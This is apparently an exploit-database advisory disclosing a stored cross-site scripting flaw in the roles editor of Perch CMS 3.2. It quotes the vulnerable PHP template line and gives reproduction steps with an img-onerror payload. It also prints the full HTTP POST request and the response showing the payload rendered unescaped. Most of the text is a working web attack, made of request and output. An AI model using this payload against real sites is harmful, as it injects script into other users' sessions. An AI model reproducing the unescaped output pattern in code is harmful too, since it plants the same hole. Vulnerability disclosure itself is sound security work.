# Exploit Title:
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 3.2
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com


XSS #1:

File: roles.edit.post.php

Line #57:

[...]
<div class="field-wrap <?php echo $Form->error('roleTitle', false);?>">
        <?php echo $Form->label('roleTitle', 'Title'); ?>
        <div class="form-entry">
            <?php echo $Form->text('roleTitle', $Form->get($details,
'roleTitle')); ?>
        </div>
    </div>
[...]



Steps to Reproduce:

1. Login to application
2. Go to Roles
3. Select Title
4. Enter payload TEST"><img src=x onerror=alert(1)>


// HTTP POST request

POST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/114.0
[...]

roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0


// HTTP response

HTTP/1.1 200 OK
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
[...]

[...]
<a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=x
onerror=alert(1)></a>
[...]